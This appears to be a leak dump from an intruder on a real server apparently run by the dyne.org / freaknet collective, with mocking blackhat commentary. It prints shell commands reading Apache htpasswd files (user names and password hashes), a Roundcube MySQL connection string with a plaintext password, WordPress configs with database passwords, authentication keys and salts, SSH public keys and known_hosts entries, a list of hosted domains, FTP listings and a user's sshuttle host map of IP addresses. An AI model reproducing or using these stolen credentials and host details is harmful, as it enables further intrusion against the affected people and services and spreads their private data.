ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA6C2xYS+GzBNFjJtd268WLvNMLAXAj2gxAegwM1zkCuIHIrF3RJtIITZLi3iHsT5BlMxQG/mOkVJxg4DUS/emPLoSJ9fMS46NGxOoXXSDgDNGw/IpcT41ArLDRbs0LAqiy2cP2xP3/aHcyFGI8lPh+w17p3MZdB1oJSUGlBZCm2xqlCiKm6bo7fCuucmUgPAV6hGcdQkKsmLI0wvtQnaxvB7qOVp45/wE3PZKT6ntlGJVDHAHd4JeplkXr0rMTZd04Fy7KzAIb7plgd8ebfcHoTXg6vmYP9j+Jj6HhGERnpA5Z2/wp4V6jakm74rXqgHAWp/ODP9XrQmn0eQlsUKTlQ== gniublin@87-198-40-3.ptr.magnet.ie
ssh-dss AAAAB3NzaC1kc3MAAACBAIkLSWpuejdMUrp8+b5M1LaSTCl+/JKyC0uFMdbqWnuqXLFgge3J4IpkNjQvdD70BBXDSFLRJ7RwYXvE+omeY684IiJ8o1FXRXQBCqItx9tZnk+81aSOjUSaMKQ1irTwtVtYjXZ9y8B6ZvMfH352pThQTm7yB4IIHhIuORhoMGDpAAAAFQCf7tvkoPTisywDSIbf4Y/y7XpubQAAAIA/4CKvzmjCAyBlLqMq2w8ivmxmRmO/DOVj1+xBgLisovnVZ/fQ7aB0kEm0kALPfSY7UAGUnHulCg52x1fRu9YRJtLs9AHf1GGhzBOkgzXM2sO72lacZWe/9Kw05jXHmLDkRXgS/R6uU7s0XBFme2twGEAERClp5SMXcTqeZ/TqdAAAAIAWjTkGY5n7VklApUho41c3ESjDtA4eSzW+wDO0docd1CU+6Ch0uBQEUMGe08BqfiR4hq+mhpR63KO8tWaEEfqEXSXryI0uGDdHGRAUR3sPZW0eoGfzB7HcRelET1hAS9MCYXCgmgal2xD7z0zU/reNK3mNE7y1jQqnBEd3W5R3bg== root@streamtime
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDAdYSagKAvFyGl5Po1nvX98FF8Py18vB06uTuF+mylgau2+/9VwEqNDPWH51cfxhGUJ5a9fZQs6iRu4IwK2zAYtT2WaY+FZiWyrWfpfDadFoytB02C+5pK5ukuJ6gW6zK9k9zcbZry3sbhWXZCmBfxhztzvZ+pthLvALTvZJhODuXPqYY4HonsXIcI8+52P1AxcsPaiBxZ3/8j4r6R1QfwN95nQMBPOhZZZdsb7SVHS5ZhUEjrHd7wW/RRk9PidWaB/m1QA9PtxaZDlSkXWxrzM5i0ar3fL8Xtuxs8CKWGEQuZ8yXoE89Z/osAOUX55PTemo7766HQbRN8mMhcKiep root@l3paddy
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC6OkMXF7lExEBJl3voolbtsOkDOP/wmbswImFsVkhz4qSFOmTB0erD5Lmc6+I+27joNd8IAlpAAhRuvxCav2YlH2q+ck7XF6pm9FjnmnIdJYurU5zZyo19FsdXcZI8eI1lr0dsIykHqtxRlcMomYoZxqdeBRvLlH4+bnARqYsqvddyi+Nld7pJddF/RaqERDh6CJRtpY6/boJIyID92q39lbdJdf/kXMPxwAOjaTyZDAk3G7MJq+/Hfh13EQAfPj4zfS8PIrqWAAa3majllnFxa94HpI2HpuBenENZ7i3pHPmDm0PnjjxpgViCiBdN44jTQflUA6JDCgeSqbgdVRIB newmark@l3paddy


|1|gtbn1JLhyR0eGPUZ4UaIsncWqoo=|kWeogt5mz7gHY+rGFdtzPBQb3Uo= ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAzEwJhoNZk5bTJMwmj2i7h3ETGN5GXigaPO6VWd8AzxQfXAti+cu+bY919wZCg8nv6HnD0a5TbVOpOf9QsQ5mWqR6mkul67/C233F2tFsjKcOM3XC5Du2L5ZQiRa/XQAaSvUhXJTyitXtRQvCnCme4aff0ZALVwz3dXZC4gzOYr4v4xAgdcqTChaUlUI5+rono/UmiSbMwo34LDqs+jz4DWMQu+zY8/7Z20h6j230mhiLcg6BHbOtvCGnc1MY5IP3CjTJFJolgq/kMhBnpoWarAYSHkqJb/vzothuW5GXj6SXiVWx6EU9LXPw24ld/+ThCQXshTnLIXMR9IVUtWH9qw==
|1|I18oY+bti0dhiK/4FZ4kx6GXj58=|Ut6h20anLdvFcv4XH76wKN7/SQI= ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAzEwJhoNZk5bTJMwmj2i7h3ETGN5GXigaPO6VWd8AzxQfXAti+cu+bY919wZCg8nv6HnD0a5TbVOpOf9QsQ5mWqR6mkul67/C233F2tFsjKcOM3XC5Du2L5ZQiRa/XQAaSvUhXJTyitXtRQvCnCme4aff0ZALVwz3dXZC4gzOYr4v4xAgdcqTChaUlUI5+rono/UmiSbMwo34LDqs+jz4DWMQu+zY8/7Z20h6j230mhiLcg6BHbOtvCGnc1MY5IP3CjTJFJolgq/kMhBnpoWarAYSHkqJb/vzothuW5GXj6SXiVWx6EU9LXPw24ld/+ThCQXshTnLIXMR9IVUtWH9qw==
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA0U3vHcQNV3qc4nsv7hJROEW+eTZDiAJcia/ydLy0M1BJI/1XDoOYE+2b/EBRbEkrxPS64tOV00FAAG9lQ9lNkmBuhg+Zz3iE/47a/t0nAcwY9jHMOxoP7bzZI8AusqfwuHZGklP0IRf9izDDqIyVZyOEIBMsRiOT4NFflG3+memmGRkiW4arIxf4Q5DDEKNYEE53FMtfg+XLncev6wJm5PaB3iByKbDXVmTaG4vns8mYmajiIXiYo/FJN+pdyvd4mew6oKdrWSprcCPV6APgEH6PTI66Js+UTN4vHqM0jYTQ285u7GaKfreQ6VaCWKOL0dYu9LBXNCZH9EfEvCnphw== Se trovate queste chiavi mandate una mail a daniel@spatof.org
Host code.dyne.org
    Port 2222
|1|WTjE5Ooz8LBwllzNCdm+aYZWhGk=|RwT6/hKkgbomnml3/lKaBfugSxI= ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAmU0cEMoyKgDKqPH/hi7HNaSYYIg23j/umU6WSRFAFtHMlyaKeuHC2sBaZ45OFXq0zugXHtefVJNRvFTKw0Q1PpNKcTf4gQMYOgozMfgBM9HXnT52Jx8uJgVlovAnyNtEdh2ircBzws/a208lYo+Fh4QyArJdBZwRlxsu5gOil/0rFplKHS6rGPQj20GIIagwLfi5GaWX85mOHJ5ybvDmYS91aIobeWjkYy/M+wpE+4zgGxmlw7m53Li9xibVCWvSY1Xb2LyR6B0kit4HWGMqUm/PRXUD70Sad8i+1Ljh1QiurCFWHimlH4OGGzPtak743qbOLaGc38ZK5SzzPNQtOQ==
|1|1TCSoBKzR/xEx3oWkrd8nhPKynM=|RhIUymI3moqD8gzOrtjrZXTiuMM= ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAmU0cEMoyKgDKqPH/hi7HNaSYYIg23j/umU6WSRFAFtHMlyaKeuHC2sBaZ45OFXq0zugXHtefVJNRvFTKw0Q1PpNKcTf4gQMYOgozMfgBM9HXnT52Jx8uJgVlovAnyNtEdh2ircBzws/a208lYo+Fh4QyArJdBZwRlxsu5gOil/0rFplKHS6rGPQj20GIIagwLfi5GaWX85mOHJ5ybvDmYS91aIobeWjkYy/M+wpE+4zgGxmlw7m53Li9xibVCWvSY1Xb2LyR6B0kit4HWGMqUm/PRXUD70Sad8i+1Ljh1QiurCFWHimlH4OGGzPtak743qbOLaGc38ZK5SzzPNQtOQ==
|1|F7uIbY6eZtUiatw3Cw8rA4JQNlE=|xwfIGMGitfYkpeUeeYTiGisIUBw= ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAyVO3AKOMkmXcdWXTHhIUDbT8W2XoPqoyxU2F1OLB6hvFaCllV10WoE7ZvXocZH37hNtaDCo6zNdNKBoI8jNb8UQE9Q51EzzVPzQL3/uVPeaFrUBXT+lFbBoA9RSAZAtlW0AzIuP1s97bRVIkgu0iZkSPTi6z+nDA6MPtgXsRLDOMVTFn0lPb5Dcwg0yqfcc6MvbMlKs8Icnm62uiB+AcwhhTEoYFnhxB/xySeNc16OM6g3FM0cMm5dOu94IkNfAwk1lsakb3ohJuAgTKvbiZQdnDMLiK+BG+CN7oH9wG4IcUQC6MKl0TOCZITz/mkGPKAdVeypOkjTzIRenRj+XS3w==
|1|G/X6tuxG2A9uL0CYj4ljrjQK4+8=|H/2uHQO06z1RpN8Rwe8z1oPrJqs= ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA4LgmoJVqkWYyJvp3MPWDQfQ1Tium3J4WhdDf1Rj90RYM21uk8pSYGesX3uvzRpcWt8E1RIcBc4PlUhB30huFvjT2x+VN3VzqcJrWFT423X41qW5M1EPAYSPP7oQ1wr9GI8GQ6C1sB3vQ2RdgqFQOjUt4xkl03h6qN8eoNZs/rdxkp6fj5fP/tU5dTPt61GZA4YHSe11m93tioQLEhVMu5c7W8XwneXw7MjAghhZx+9ioHXKq9Q9gJa328vOYn933dUWtM8mVQKL6lcpKvFGQ/EOWXlISdlTNrlqY9Z2kYxUiGeBR05NghDQI5BHk+e01R+g4NYQ4oXXeyB6NxAlkyQ==
|1|WT131gnVXy5Z7UJjKmq+8brqbNA=|O1APCtDPU4lP5C/9mP8rCLm7bDg= ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA4LgmoJVqkWYyJvp3MPWDQfQ1Tium3J4WhdDf1Rj90RYM21uk8pSYGesX3uvzRpcWt8E1RIcBc4PlUhB30huFvjT2x+VN3VzqcJrWFT423X41qW5M1EPAYSPP7oQ1wr9GI8GQ6C1sB3vQ2RdgqFQOjUt4xkl03h6qN8eoNZs/rdxkp6fj5fP/tU5dTPt61GZA4YHSe11m93tioQLEhVMu5c7W8XwneXw7MjAghhZx+9ioHXKq9Q9gJa328vOYn933dUWtM8mVQKL6lcpKvFGQ/EOWXlISdlTNrlqY9Z2kYxUiGeBR05NghDQI5BHk+e01R+g4NYQ4oXXeyB6NxAlkyQ==
|1|8sG5iCjTkJHAmaXwG1GJaWlwIdE=|L6s2BbOUyH6L+1Y5NhL5Ylnu2Fg= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1L/ZF0wis/bYiFgshjf7ZNSeLVr3T3MiyVp14fCMw4ruvUNyWdGppFmem7QAyD9nTwpX/ZmuneUB72sYlmMhGmBnhvo64R+XZYw8gmGscLE+NZA7ccAiJ7NIyRzcw2LYkw0P3hpPTleaHdPll888LwG3GpM57Nlbq5D2qFFEwZ3jWbAs2YtOygIcqfmr7O3qlyoeJHag0FjWnREDv677+FH47hv9lHg8iUG87WmFuz7FQyO5adTS5FR2DU+E/gAa5/qEjDCMasRr9dby9ctwLS0/vO8JTxsdvCoAixRs4ekWxU1q8FJJNuE5Ss/6u83e/mQZEiwiWAxJbEEfjVELR
|1|yiszUBC+7mTFvUMFuj1yprd4fxA=|3G5WUTUhJBr3EUpxYRW1R79LtT8= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1L/ZF0wis/bYiFgshjf7ZNSeLVr3T3MiyVp14fCMw4ruvUNyWdGppFmem7QAyD9nTwpX/ZmuneUB72sYlmMhGmBnhvo64R+XZYw8gmGscLE+NZA7ccAiJ7NIyRzcw2LYkw0P3hpPTleaHdPll888LwG3GpM57Nlbq5D2qFFEwZ3jWbAs2YtOygIcqfmr7O3qlyoeJHag0FjWnREDv677+FH47hv9lHg8iUG87WmFuz7FQyO5adTS5FR2DU+E/gAa5/qEjDCMasRr9dby9ctwLS0/vO8JTxsdvCoAixRs4ekWxU1q8FJJNuE5Ss/6u83e/mQZEiwiWAxJbEEfjVELR
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAx+G8tWgT1CvM1rv2L7Lw8W3Wg/dW6O6cdHLYg8p1ycBWnnQRBolNqSf1Jr4V1D95B2jBVPH1sDss/aSEBoco1NOgSOzw/c5DGdseKcO41l8DrPAbcu2xetDDv8wHOhjMjg7NI8yWXb9RydEINnCaxcclxTdH/nMK+PSixGU5G0ncq+3g+KD7hB8Ws3oQHGWg508aeL7Ns7i2Cph2kxCGt1aS/nUO64lSPynfhD+CRJycJIZTeEpeHZjM0vF7ylxdNj2HrDFhJ+SSJnBirEcnqfBRdhTEzA1uk8NhpTO36Z2IREB7eA5jfRvYz4bAx7vMXanFXZbpniTiYuEroTMAAw== vlax@chante

$ ls -al /etc/apache2
total 96
drwxr-xr-x 8 root root 4096 Nov 5 23:29 .
drwxr-xr-x 102 root root 4096 Dec 21 16:06 ..
-rw-r--r-- 1 root root 8117 Apr 30 2012 apache2.conf
-rwxr--r-- 1 root root 43 Apr 26 2011 bookshelfpassword
drwxr-xr-x 2 root root 4096 Dec 2 09:49 conf.d
-rw-r--r-- 1 root root 1169 Dec 9 2010 envvars
-rw-r--r-- 1 root root 0 Sep 24 10:00 httpd.conf
-rw-r--r-- 1 root root 31063 Dec 9 2010 magic
drwxr-xr-x 2 root root 12288 Dec 2 09:54 mods-available
drwxr-xr-x 2 root root 4096 Mar 31 2012 mods-enabled
-rw-r--r-- 1 root root 750 Dec 9 2010 ports.conf
-rw-r--r-- 1 root root 19 Feb 11 2011 sand.htpasswd
drwxr-xr-x 2 root root 4096 Dec 21 16:07 sites-available
drwxr-xr-x 2 root root 4096 Dec 21 16:07 sites-enabled
drwxr-xr-x 2 root root 4096 Mar 30 2012 ssl

$ cat /etc/apache2/bookshelfpassword
newmark:XLsrbiuONuljc
luther:2j4hCHUPEkRsw

$ cat /etc/apache2/sand.htpasswd
sand:c4jTpl9Ta8TdU

wats in d1s btch?!
$ ls /etc/apache2/sites-enabled
00-default
antig8
apt-repository
autorg
banners
bitcoin
bugs_mantis
caroprocione.com
code.dyne.org
democrazialiquida
doblin3.net
dynebolic
ezio
farah
freej
frei0r
ftp.dyne.org
hasciicam
jaromail
jaroweb
jrml
lab.dyne.org
lamentazioni.org
leap
lists.dyne.org
messinalug.org
misfu
muse
museo.freaknet.org
netsukuku-old
poetry.freaknet.org
search.dyne.org
selmessina.org
stats
streamtime.org
tbt
threadgate
tomb
tubocatodico
vlax.dyne.org
webmail
www.freaknet.org
zshaolin

0mgz! bitcoin? code repoz?! emailz?!!! AND FUCKING POETRY?
dyne sure knoz how to tug on a blackhats heart stringz!

$ ls /etc/wordpress
config-dynebolic.org.php
config-sites.dyne.org.php
htaccess
wp-config.php


mysql://roundcube:3mai1lp4ssw02rd0122@localhost/roundcubemail

$ cat /etc/wordpress/*.php
<?php
define('DB_NAME', 'sites');
define('DB_USER', 'sites');
define('DB_PASSWORD', 'Q4IRNlBS');
define('DB_HOST', 'localhost');
define('SECRET_KEY', 'HrZzJ9GG4blLScFwq3VZtzzPeHyepKjKwBnD6IzxRl');

#This will disable the update notification.
define('WP_CORE_UPDATE', false);

$table_prefix  = 'wp_';
$server = DB_HOST;
$loginsql = DB_USER;
$passsql = DB_PASSWORD;
$base = DB_NAME;
$upload_path = "/srv/www/wp-uploads/sites.dyne.org";
$upload_url_path = "http://dynebolic.org/wp-uploads";

define( 'SUBDOMAIN_INSTALL', true );
$base = '/';
define( 'DOMAIN_CURRENT_SITE', 'dynebolic.org' );
define( 'PATH_CURRENT_SITE', '/' );
define( 'SITE_ID_CURRENT_SITE', 6 );
define( 'BLOG_ID_CURRENT_SITE', 6 );

define( 'AUTH_KEY', '5kW18t`)t-1I@kuwNG?dH(U Pu{*-4TfM{lHy|44/|i6T <MC.rF{xM]eL;Rh6t3' );
define( 'SECURE_AUTH_KEY', 'aM?u,SwN]u0i)G|LdvK-g{~OQQ,N%DpJ=u!z.vnw|IA<R$@d|q8r/PV+poGWxIP)' );
define( 'LOGGED_IN_KEY', '921!Vp gbo7u,^k6nH-|9z_}u$c5C~M(OSFO4ZNAGK^2YVl)PuVH)Xe{+OI%]N2M' );
define( 'NONCE_KEY', '5s)}(D6ftBT^0! ZLIegwqLN+d(JET5{%?bl3{|4QK-o3Zwa.p16gSaJo|{]7D$D' );
define( 'AUTH_SALT', '*q.&25>4H8JF4Wh|#mHSR=8:^|OrFrSkMrG$pVkz-Rg+bY2!e)2SLbfll^:6OzCR' );
define( 'SECURE_AUTH_SALT', 'X%15D2A-tCB0*){tp2$2jSc+* zX2ORYX5u+T5h1-|yYkSfB8hi:E+F$@_L*=S17' );
define( 'LOGGED_IN_SALT', '0{AQj]}+9aVQV8c;4M?owWnPgOKj6>K4*}%hPh3)4+.ioz&E*UNv*&;GraKp+kkL' );
define( 'NONCE_SALT', '_)4s@=j|464Iw40AHiU:xqZ$D=grQdLf(Rg4RW%f1|?c2Kio+/6edm%L+Szf`j<z' );

define( 'MULTISITE', true );

# for debugging purposes only
# define('WP_DEBUG', true);


?>

<?php
define('DB_NAME', 'sites');
define('DB_USER', 'sites');
define('DB_PASSWORD', 'Q4IRNlBS');
define('DB_HOST', 'localhost');
define('SECRET_KEY', 'HrZzJ9GG4blLScFwq3VZtzzPeHyepKjKwBnD6IzxRl');

#This will disable the update notification.
define('WP_CORE_UPDATE', false);

$table_prefix  = 'wp_';
$server = DB_HOST;
$loginsql = DB_USER;
$passsql = DB_PASSWORD;
$base = DB_NAME;
$upload_path = "/srv/www/wp-uploads/sites.dyne.org";
$upload_url_path = "http://sites.dyne.org/wp-uploads";

define( 'SUBDOMAIN_INSTALL', true );
$base = '/';
define( 'DOMAIN_CURRENT_SITE', 'sites.dyne.org' );
define( 'PATH_CURRENT_SITE', '/' );
define( 'SITE_ID_CURRENT_SITE', 1 );
define( 'BLOG_ID_CURRENT_SITE', 1 );

define( 'AUTH_KEY', '5kW18t`)t-1I@kuwNG?dH(U Pu{*-4TfM{lHy|44/|i6T <MC.rF{xM]eL;Rh6t3' );
define( 'SECURE_AUTH_KEY', 'aM?u,SwN]u0i)G|LdvK-g{~OQQ,N%DpJ=u!z.vnw|IA<R$@d|q8r/PV+poGWxIP)' );
define( 'LOGGED_IN_KEY', '921!Vp gbo7u,^k6nH-|9z_}u$c5C~M(OSFO4ZNAGK^2YVl)PuVH)Xe{+OI%]N2M' );
define( 'NONCE_KEY', '5s)}(D6ftBT^0! ZLIegwqLN+d(JET5{%?bl3{|4QK-o3Zwa.p16gSaJo|{]7D$D' );
define( 'AUTH_SALT', '*q.&25>4H8JF4Wh|#mHSR=8:^|OrFrSkMrG$pVkz-Rg+bY2!e)2SLbfll^:6OzCR' );
define( 'SECURE_AUTH_SALT', 'X%15D2A-tCB0*){tp2$2jSc+* zX2ORYX5u+T5h1-|yYkSfB8hi:E+F$@_L*=S17' );
define( 'LOGGED_IN_SALT', '0{AQj]}+9aVQV8c;4M?owWnPgOKj6>K4*}%hPh3)4+.ioz&E*UNv*&;GraKp+kkL' );
define( 'NONCE_SALT', '_)4s@=j|464Iw40AHiU:xqZ$D=grQdLf(Rg4RW%f1|?c2Kio+/6edm%L+Szf`j<z' );

define( 'MULTISITE', true );

# for debugging purposes only
# define('WP_DEBUG', true);
?>
<?php
/***
 * WordPress's Debianised default master config file
 * Please do NOT edit and learn how the configuration works in
 * /usr/share/doc/wordpress/README.Debian
 ***/

/* Look up a host-specific config file in
 * /etc/wordpress/config-<host>.php or /etc/wordpress/config-<domain>.php
 */
$debian_server = preg_replace('/:.*/', "", $_SERVER['HTTP_HOST']);
$debian_server = preg_replace("/[^a-zA-Z0-9.\-]/", "", $debian_server);
$debian_file = '/etc/wordpress/config-'.strtolower($debian_server).'.php';
/* Main site in case of multisite with subdomains */
$debian_main_server = preg_replace("/^[^.]*\./", "", $debian_server);
$debian_main_file = '/etc/wordpress/config-'.strtolower($debian_main_server).'.php';

if (file_exists($debian_file)) {
    require_once($debian_file);
    define('DEBIAN_FILE', $debian_file);
} elseif (file_exists($debian_main_file)) {
    require_once($debian_main_file);
    define('DEBIAN_FILE', $debian_main_file);
} elseif (file_exists("/etc/wordpress/config-default.php")) {
    require_once("/etc/wordpress/config-default.php");
    define('DEBIAN_FILE', "/etc/wordpress/config-default.php");
} else {
    header("HTTP/1.0 404 Not Found");
    echo "Neither <b>$debian_file</b> nor <b>$debian_main_file</b> could be found. <br/> Ensure one of them exists, is readable by the webserver and contains the right password/username.";
    exit(1);
}

/* Default value for some constants if they have not yet been set
   by the host-specific config files */
define( 'SUNRISE', 'on' );
define('ABSPATH', '/usr/share/wordpress/');
define('WP_CORE_UPDATE', false);
define('WP_ALLOW_MULTISITE', true);
define('DB_NAME', 'wordpress');
define('DB_USER', 'wordpress');
define('DB_HOST', 'localhost');

/* activate plugin supercache */
define('WP_CACHE', true);

/* Default value for the table_prefix variable so that it doesn't need to
   be put in every host-specific config file */
if (!isset($table_prefix)) {
    $table_prefix = 'wp_';
}

require_once(ABSPATH . 'wp-settings.php');
?>

$ grep 'ServerName' /etc/apache2/sites-enabled/*
/etc/apache2/sites-enabled/antig8:  ServerName antig8.dyne.org
/etc/apache2/sites-enabled/apt-repository:  ServerName apt.dyne.org
/etc/apache2/sites-enabled/autorg:  ServerName autorg.dyne.org
/etc/apache2/sites-enabled/banners: ServerName banners.dyne.org
/etc/apache2/sites-enabled/bitcoin: ServerName bitcoin.dyne.org
/etc/apache2/sites-enabled/bugs_mantis: ServerName bugs.dyne.org
/etc/apache2/sites-enabled/caroprocione.com:ServerName www.caroprocione.com
/etc/apache2/sites-enabled/caroprocione.com:ServerName amadio.caroprocione.com
/etc/apache2/sites-enabled/caroprocione.com:#ServerName baise-moi.caroprocione.com
/etc/apache2/sites-enabled/caroprocione.com:ServerName sic-me-vivere.caroprocione.com
/etc/apache2/sites-enabled/caroprocione.com:#ServerName freedom.caroprocione.com
/etc/apache2/sites-enabled/caroprocione.com:ServerName mind_the_head.caroprocione.com
/etc/apache2/sites-enabled/caroprocione.com:ServerName imagine.caroprocione.com
/etc/apache2/sites-enabled/caroprocione.com:ServerName the-listing.caroprocione.com
/etc/apache2/sites-enabled/caroprocione.com:ServerName imagine.caroprocione.com
/etc/apache2/sites-enabled/caroprocione.com:ServerName blog.caroprocione.com
/etc/apache2/sites-enabled/code.dyne.org:        ServerName git.dyne.org
/etc/apache2/sites-enabled/democrazialiquida: ServerName democrazialiquida.eu
/etc/apache2/sites-enabled/doblin3.net: ServerName www.doblin3.net
/etc/apache2/sites-enabled/dynebolic: ServerName torrent.dynebolic.org
/etc/apache2/sites-enabled/ezio:  ServerName ezio.dyne.org
/etc/apache2/sites-enabled/farah: ServerName farah.dyne.org
/etc/apache2/sites-enabled/freej: ServerName freej.dyne.org
/etc/apache2/sites-enabled/frei0r:  ServerName frei0r.dyne.org
/etc/apache2/sites-enabled/ftp.dyne.org:  ServerName ftp.dyne.org
/etc/apache2/sites-enabled/hasciicam: ServerName ascii.dyne.org
/etc/apache2/sites-enabled/jaromail:  ServerName jaromail.dyne.org
/etc/apache2/sites-enabled/jaroweb: ServerName jaroweb.dyne.org
/etc/apache2/sites-enabled/jrml:        ServerName rastasoft.org
/etc/apache2/sites-enabled/jrml:        ServerName jaromil.dyne.org
/etc/apache2/sites-enabled/lab.dyne.org:        ServerName lab.dyne.org
/etc/apache2/sites-enabled/lab.dyne.org:        # ServerName lab.dyne.org
/etc/apache2/sites-enabled/lamentazioni.org:  ServerName www.lamentazioni.org
/etc/apache2/sites-enabled/lamentazioni.org:  ServerName redazione.lamentazioni.org
/etc/apache2/sites-enabled/leap:  ServerName leap.dyne.org
/etc/apache2/sites-enabled/lists.dyne.org:    ServerName lists.dyne.org
/etc/apache2/sites-enabled/messinalug.org:  ServerName www.messinalug.org
/etc/apache2/sites-enabled/messinalug.org:        ServerName linuxday.messinalug.org
/etc/apache2/sites-enabled/misfu: ServerName misfu.dyne.org
/etc/apache2/sites-enabled/muse:  ServerName muse.dyne.org
/etc/apache2/sites-enabled/museo.freaknet.org:  ServerName wiki.museo.freaknet.org
/etc/apache2/sites-enabled/museo.freaknet.org:ServerName museo.dyne.org
/etc/apache2/sites-enabled/netsukuku-old:        ServerName netsukuku.org
/etc/apache2/sites-enabled/poetry.freaknet.org: ServerName poetry.freaknet.org
/etc/apache2/sites-enabled/poetry.freaknet.org: ServerName poetryold.freaknet.org
/etc/apache2/sites-enabled/search.dyne.org: ServerName search.dyne.org
/etc/apache2/sites-enabled/selmessina.org:  ServerName www.selmessina.org
/etc/apache2/sites-enabled/stats: ServerName stats.dyne.org
/etc/apache2/sites-enabled/streamtime.org:        ServerName m2m.streamtime.org
/etc/apache2/sites-enabled/streamtime.org:  ServerName www.streamtime.org
/etc/apache2/sites-enabled/streamtime.org:  ServerName beirut.streamtime.org
/etc/apache2/sites-enabled/streamtime.org:# ServerName phone.streamtime.org
/etc/apache2/sites-enabled/streamtime.org:  ServerName bluf.streamtime.org
/etc/apache2/sites-enabled/streamtime.org:  ServerName sakho.streamtime.org
/etc/apache2/sites-enabled/tbt: ServerName tbt.dyne.org
/etc/apache2/sites-enabled/threadgate:        ServerName threadgate.dyne.org
/etc/apache2/sites-enabled/tomb:  ServerName tomb.dyne.org
/etc/apache2/sites-enabled/tubocatodico:  ServerName tubocatodico.dyne.org
/etc/apache2/sites-enabled/vlax.dyne.org: ServerName vlax.dyne.org
/etc/apache2/sites-enabled/webmail:    ServerName webmail.freaknet.org
/etc/apache2/sites-enabled/webmail:    ServerName webmail.freaknet.org
/etc/apache2/sites-enabled/www.freaknet.org:  ServerName www.freaknet.org
/etc/apache2/sites-enabled/zshaolin:  ServerName zshaolin.org


$ ls /srv/ftp/*
/srv/ftp/LICENSE.GPL  /srv/ftp/README     /srv/ftp/robots.txt
/srv/ftp/MIRRORS      /srv/ftp/favicon.ico

/srv/ftp/autorg:
AUTHORS  COPYING  ChangeLog  README  binary  sources

/srv/ftp/avremote:
AUTHORS  COPYING  ChangeLog  README  TODO.html  binary  releases

/srv/ftp/books:
ConnessioniLeggendarie.pdf         net.art.pdf
MEDIA_ACTIVISM.rtf           networking.pdf
free-beer-1.0.pdf          the-internet-of-things.pdf
how-open-is-the-future.pdf         weaver_birds.pdf
internet-hackers-y-software-libre.pdf

/srv/ftp/dirsum:
AUTHORS  COPYING    HELP     NEWS    debian    manual.html
BUGS   ChangeLog  INSTALL  README  dirsum.1  releases

/srv/ftp/dynebolic:
README  dyne2-manual.pdf  index.txt  latest  releases

/srv/ftp/eeepc:
initramfs-eeepc-jrml.img  kernel  ramdisk

/srv/ftp/emerde:
files  ogg

/srv/ftp/fakiir:
ChangeLog  README  releases

/srv/ftp/freecoin:
freecoin-0.4.0.tar.gz  freecoin-0.4.0.tar.gz.md5

/srv/ftp/freej:
API    INSTALL     README.CVS  binary   releases
AUTHORS    KNOWN-BUGS  README.OSX  freej_scripting.txt  scripts
COPYING    NEWS        TODO    old-binaries   snapshot
ChangeLog  README      USAGE     plugins    sources

/srv/ftp/frei0r:
AUTHORS  ChangeLog  README  TODO  releases  snapshots

/srv/ftp/hasciicam:
AUTHORS  ChangeLog  NEWS    TODO   hasciicam.html
COPYING  INSTALL    README  hasciicam.1  releases

/srv/ftp/hdsync:
AUTHORS  ChangeLog  README  binary    hdsync_manual.pdf  tools
COPYING  NEWS     TODO    hdsync-diagram.png  releases

/srv/ftp/history:
WORK_IN_PROGRESS  audio  flyers  press  video

/srv/ftp/ivysync:
AUTHORS  COPYING  README  scripts  sources

/srv/ftp/jaromail:
ChangeLog  README  TODO  binary  jaromail-manual.pdf  releases

/srv/ftp/leap:
README  openvpn

/srv/ftp/muse:
AUTHORS    KNOWN-BUGS  USAGE          old-binaries
COPYING    NEWS        binary         opensource-radio-streaming.pdf
ChangeLog  README      muse-commandline.html  releases
INSTALL    TODO        muse.1         sources

/srv/ftp/ploop:
AUTHORS  COPYING  README  binary  releases

/srv/ftp/tamburine:
AUTHORS  ChangeLog  INSTALL  README  USAGE  XMLRPC-API  pics  releases

/srv/ftp/tbt:
AUTHORS  ChangeLog  README  binaries    releases
COPYING  NEWS     TODO    old-binaries

/srv/ftp/tomb:
AUTHORS  ChangeLog  README  TODO.org  debian  releases

/srv/ftp/tortv:
AUTHORS  ChangeLog  README  binaries  libs  source

/srv/ftp/zshaolin:
README  packages  sources  toolchains

/home/jaromil$ cat .sshuttle.hosts
088156079143,88.156.79.143
174,174.36.241.151
174-37-205-76,174.37.205.76
212-226-75-8-nat,212.226.75.8
68-114-125-185,68.114.125.185
85-127-252-170,85.127.252.170
GYMKDCCL,85.77.118.150
apt,178.21.114.184
assata,178.21.114.142
athedsl-4522396,94.71.237.164
baiduspider-180-76-5-103,180.76.5.103
baiduspider-180-76-5-107,180.76.5.107
baiduspider-180-76-5-110,180.76.5.110
baiduspider-180-76-5-139,180.76.5.139
baiduspider-180-76-5-147,180.76.5.147
baiduspider-180-76-5-151,180.76.5.151
baiduspider-180-76-5-153,180.76.5.153
baiduspider-180-76-5-155,180.76.5.155
baiduspider-180-76-5-158,180.76.5.158
baiduspider-180-76-5-167,180.76.5.167
baiduspider-180-76-5-168,180.76.5.168
baiduspider-180-76-5-173,180.76.5.173
baiduspider-180-76-5-180,180.76.5.180
baiduspider-180-76-5-188,180.76.5.188
baiduspider-180-76-5-190,180.76.5.190
baiduspider-180-76-5-191,180.76.5.191
baiduspider-180-76-5-55,180.76.5.55
baiduspider-180-76-5-61,180.76.5.61
baiduspider-180-76-5-65,180.76.5.65
baiduspider-180-76-5-87,180.76.5.87
baiduspider-180-76-5-91,180.76.5.91
baiduspider-180-76-5-92,180.76.5.92
cpc1-stre3-0-0-cust169,82.29.100.170
cpc2-dals14-2-0-cust335,77.99.177.80
crawl-66-249-72-186,66.249.72.186
crawl-66-249-72-66,66.249.72.66
cust-69-140,92.118.69.140
dslb-088-064-191-254,88.64.191.254
fixed-203-203-4,189.203.203.4
h143117,62.194.143.117
hinezumi,95.142.162.75
mail,193.200.132.160
munir,178.21.114.184
museo,178.21.114.184
museum,178.21.114.184
net-93-64-207-178,93.64.207.178
new,178.21.114.184
